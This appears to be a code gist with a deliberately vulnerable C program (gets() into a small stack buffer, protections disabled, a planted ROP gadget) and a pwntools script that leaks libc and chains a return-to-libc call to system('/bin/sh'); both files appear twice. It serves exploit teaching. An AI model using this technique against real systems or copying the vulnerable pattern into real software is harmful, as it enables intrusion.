moyix/basicbof.c

## basicbof.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

// Build:
// gcc -gdwarf-4 -fcf-protection=none -no-pie -fno-stack-protector basicbof.c -o basicbof

// To give us a pop rdi gadget
void dosomething() {
    int x = 0xc35f;
    return;
}

int main(void) {
    char buf[32] = {0};
    puts("Hello!");
    gets(buf);
    return 0;
}

## doublerop.py
from pwn import *

p = process('./basicbof')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

print("puts@plt:", hex(p.elf.plt['puts'])) # puts@PLT
print("puts@got:", hex(p.elf.got['puts']))# puts@GOT
padding = b'A'*0x38
pop_rdi_gadget = 0x40113d
rop_chain = (p64(pop_rdi_gadget) + p64(p.elf.got['puts']) +
             p64(p.elf.plt['puts']) + p64(p.elf.symbols['main']))
print(p.readline())
p.sendline(padding + rop_chain)
puts_str = p.readline()
print("puts(puts@got) =>", puts_str.hex())
real_puts_addr = int.from_bytes(puts_str[:-1], byteorder='little')
libc_base = real_puts_addr - libc.symbols['puts']
print("libc base:", hex(libc_base))
system_addr = libc_base + libc.symbols['system']
print("system_addr:", hex(system_addr))
bin_sh_offset = libc.data.find(b'/bin/sh\x00')
bin_sh_addr = libc_base + bin_sh_offset
print("/bin/sh addr:", hex(bin_sh_addr))
ret = pop_rdi_gadget + 1
print("ret gadget:", hex(ret))
new_rop_chain = (p64(pop_rdi_gadget) + p64(bin_sh_addr) +
                 p64(ret) + p64(system_addr))
print(p.readline())
p.sendline(padding + new_rop_chain)
p.interactive()
	#include <stdio.h>
	#include <stdlib.h>
	#include <unistd.h>

	// Build:
	// gcc -gdwarf-4 -fcf-protection=none -no-pie -fno-stack-protector basicbof.c -o basicbof

	// To give us a pop rdi gadget
	void dosomething() {
	int x = 0xc35f;
	return;
	}

	int main(void) {
	char buf[32] = {0};
	puts("Hello!");
	gets(buf);
	return 0;
	}
	from pwn import *

	p = process('./basicbof')
	libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

	print("puts@plt:", hex(p.elf.plt['puts'])) # puts@PLT
	print("puts@got:", hex(p.elf.got['puts']))# puts@GOT
	padding = b'A'*0x38
	pop_rdi_gadget = 0x40113d
	rop_chain = (p64(pop_rdi_gadget) + p64(p.elf.got['puts']) +
	p64(p.elf.plt['puts']) + p64(p.elf.symbols['main']))
	print(p.readline())
	p.sendline(padding + rop_chain)
	puts_str = p.readline()
	print("puts(puts@got) =>", puts_str.hex())
	real_puts_addr = int.from_bytes(puts_str[:-1], byteorder='little')
	libc_base = real_puts_addr - libc.symbols['puts']
	print("libc base:", hex(libc_base))
	system_addr = libc_base + libc.symbols['system']
	print("system_addr:", hex(system_addr))
	bin_sh_offset = libc.data.find(b'/bin/sh\x00')
	bin_sh_addr = libc_base + bin_sh_offset
	print("/bin/sh addr:", hex(bin_sh_addr))
	ret = pop_rdi_gadget + 1
	print("ret gadget:", hex(ret))
	new_rop_chain = (p64(pop_rdi_gadget) + p64(bin_sh_addr) +
	p64(ret) + p64(system_addr))
	print(p.readline())
	p.sendline(padding + new_rop_chain)
	p.interactive()